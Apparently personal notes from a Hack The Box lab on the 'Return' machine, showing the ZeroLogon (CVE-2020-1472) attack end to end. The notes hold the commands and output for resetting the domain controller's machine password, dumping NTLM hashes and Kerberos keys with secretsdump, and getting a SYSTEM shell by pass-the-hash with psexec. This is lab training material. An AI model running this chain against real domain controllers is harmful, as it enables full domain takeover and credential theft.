CVE-2020-1472

zerologon attack enables an unauthenticated attacker to remotely escalate their privileges straight to Domain Admin, with network access to a domain controller as the only requirement.

the vulnerability is present at an insecure implementation of AES-CFB8 in the MS-NRPC by brute-forcing the authentication up to 256 times with a challenge and ciphertext consisting of 8 zero-bytes \x00', resulting the eventual match that leads to authentication bypass as the machine account. It then resets the password empty.

more about this vulnerability here

The target system is likely vulnerable given the fact that it is running Windows Server 2019

exploit (zerologon)

I got the exploit script from the GitHub repo

Testing

┌──(kali㉿kali)-[~/…/htb/labs/return/CVE-2021-34527]
└─$ cme smb $IP -d RETURN.LOCAL --kdcHost printer.return.local -u '' -p '' -M zerologon
smb         10.10.11.108    445    printer          [*] windows 10.0 build 17763 x64 (name:PRINTER) (domain:RETURN.LOCAL) (signing:True) (SMBv1:False)
smb         10.10.11.108    445    printer          [-] return.local\: STATUS_ACCESS_DENIED 
ZEROLOGO... 10.10.11.108    445    PRINTER          VULNERABLE
zerologo... 10.10.11.108    445    printer          next step: https://github.com/dirkjanm/CVE-2020-1472

crackmapexec has a module available to test for the zerologon exploit above As the result shown above, the target system is confirmed to be vulnerable

For this exploit, I don’t even need a credential

Exploitation

┌──(kali㉿kali)-[~/…/htb/labs/return/CVE-2020-1472]
└─$ python3 ZeroLogon.py printer $IP
Performing authentication attempts...
===========
Target vulnerable, changing account password to empty string
 
Result: 0
 
Exploit complete!

Done I never needed any credential. Hence the name of the exploit, ZeroLogon The machine account printer$ now should have no password

At this point I can do anything

Hashdump

┌──(kali㉿kali)-[~/…/htb/labs/return/CVE-2020-1472]
└─$ impacket-secretsdump 'printer$@printer.return.local' -no-pass -target-ip $IP -dc-ip $IP  
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
 
[-] remoteoperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] dumping domain credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
administrator:500:aad3b435b51404eeaad3b435b51404ee:32db622ed9c00dd1039d8288b0407460:::
guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4e48ce125611add31a32cd79e529964b:::
return.local\svc-printer:1103:aad3b435b51404eeaad3b435b51404ee:c1d26bdcecf44246b5f8653284331a2e:::
adm1n:6106:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::
printer$:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
win-btt8jh9zu7d$:6101:aad3b435b51404eeaad3b435b51404ee:d5a1639e71af144a93e7921063ba4965:::
win-zdyo0ta5dln$:6102:aad3b435b51404eeaad3b435b51404ee:8cd5277ac440c3fbe98cd093c1684297:::
win-upqbcaw6ci8$:6103:aad3b435b51404eeaad3b435b51404ee:71c421066ad175a954e5964b82aeb7f1:::
win-ljye51golme$:6104:aad3b435b51404eeaad3b435b51404ee:beb45a5ee90ab11f3ce57122ba829d4c:::
win-blvzwhnyle2$:6105:aad3b435b51404eeaad3b435b51404ee:296bc1d1b7e86076c2adec4ff7775f8a:::
[*] Kerberos keys grabbed
administrator:aes256-cts-hmac-sha1-96:2f7d707eb859ec2c26109953831f54861a0ee47d3e4b16dde7f17009d08297b0
administrator:aes128-cts-hmac-sha1-96:ef8673c4ba668752432c817dda62af48
administrator:des-cbc-md5:4f0ee6291aabd338
krbtgt:aes256-cts-hmac-sha1-96:cc6ddaa28d2bb97926dabd1b82845479a97080aad93eddfd2ccf4f2ddf00961a
krbtgt:aes128-cts-hmac-sha1-96:cc5f4a49b6a0cdb71cdea34e84ba2a2e
krbtgt:des-cbc-md5:1086497c1fc1ab8a
return.local\svc-printer:aes256-cts-hmac-sha1-96:6dd6f85d0cf31eb1c01d7aff4e30a58bc5948e6f05e6d88f5cdb57be0208117d
return.local\svc-printer:aes128-cts-hmac-sha1-96:a92bc84131dcd4309431242e8ee9437e
return.local\svc-printer:des-cbc-md5:574cb9a8a8e5cb43
adm1n:aes256-cts-hmac-sha1-96:3a0b9cf60044aba3341f8568b508832e4a9bf8d41b14e9bdb5976d60e8b0aa46
adm1n:aes128-cts-hmac-sha1-96:14ac271e2a68d075291fa956016d54c5
adm1n:des-cbc-md5:bf80f7c1b9439749
printer$:aes256-cts-hmac-sha1-96:d90be0e50526f764ce407185706c3dbe9d64c5201437cb4c4de2395ee6cff5a9
printer$:aes128-cts-hmac-sha1-96:c87c438c04ba990a826c7cdb2f133328
printer$:des-cbc-md5:2f2a515b088c921a
win-btt8jh9zu7d$:aes256-cts-hmac-sha1-96:41597db8d62a1e39d29298137422439151e47414f145dc3000129a86f6e4b67e
win-btt8jh9zu7d$:aes128-cts-hmac-sha1-96:95bbe6e763622f64d61a6bc2d2931417
win-btt8jh9zu7d$:des-cbc-md5:ba6b13fe5b310d68
win-zdyo0ta5dln$:aes256-cts-hmac-sha1-96:f2656ac81bc9736177d6ad189045dcd3799d3070f7011d8f3114c02506d15534
win-zdyo0ta5dln$:aes128-cts-hmac-sha1-96:ebff090f26d8e80ddad5c012a68d5840
win-zdyo0ta5dln$:des-cbc-md5:386dcdb5fec86798
win-upqbcaw6ci8$:aes256-cts-hmac-sha1-96:79042054d4172c8fb9fb4b109899784aac4f0212e98715a94e11b18b18570802
win-upqbcaw6ci8$:aes128-cts-hmac-sha1-96:46bac209bb63287a60a48d4da5edceaf
win-upqbcaw6ci8$:des-cbc-md5:9e01ce89d0ab89d9
win-ljye51golme$:aes256-cts-hmac-sha1-96:2954b1d6580fe5d03723e0f93069205e172a96dc1d9d5dc2964a0ce5e8321915
win-ljye51golme$:aes128-cts-hmac-sha1-96:0b466f76511caa0e84b3876a57c88a20
win-ljye51golme$:des-cbc-md5:a1df45ec85aef423
win-blvzwhnyle2$:aes256-cts-hmac-sha1-96:0b192467ca1ebe6301976d3cc779a058adafc35613b3c67269bd1087d71100fc
win-blvzwhnyle2$:aes128-cts-hmac-sha1-96:adf7063eea9e7180360df2bd693312a3
win-blvzwhnyle2$:des-cbc-md5:e3618fd546086b9e
[*] Cleaning up...

Domain Level Compromise

Shelldrop

┌──(kali㉿kali)-[~/…/htb/labs/return/CVE-2020-1472]
└─$ impacket-psexec 'return.local/administrator@printer.return.local' -no-pass -hashes 'aad3b435b51404eeaad3b435b51404ee:32db622ed9c00dd1039d8288b0407460' 
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
 
[*] Requesting shares on printer.return.local.....
[*] Found writable share ADMIN$
[*] Uploading file ibcaBQUg.exe
[*] Opening SVCManager on printer.return.local.....
[*] Creating service HHAH on printer.return.local.....
[*] Starting service HHAH.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.
 
C:\Windows\system32> whoami
nt authority\system
 
C:\Windows\system32> hostname
printer
 
C:\Windows\system32> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0:
 
   Connection-specific DNS Suffix  . : htb
   IPv6 Address. . . . . . . . . . . : dead:beef::1a2
   IPv6 Address. . . . . . . . . . . : dead:beef::3ca0:8079:2c38:f2ac
   Link-local IPv6 Address . . . . . : fe80::3ca0:8079:2c38:f2ac%10
   IPv4 Address. . . . . . . . . . . : 10.10.11.108
   Subnet Mask . . . . . . . . . . . : 255.255.254.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:eec2%10
                                       10.10.10.2

System Level Compromise

InfoSec LAB

Explorer

Return_Privilege_Escalation_5

CVE-2020-1472

exploit (zerologon)

Testing

Exploitation

Hashdump

Shelldrop

Interactive Graph View

Table of Contents

Backlinks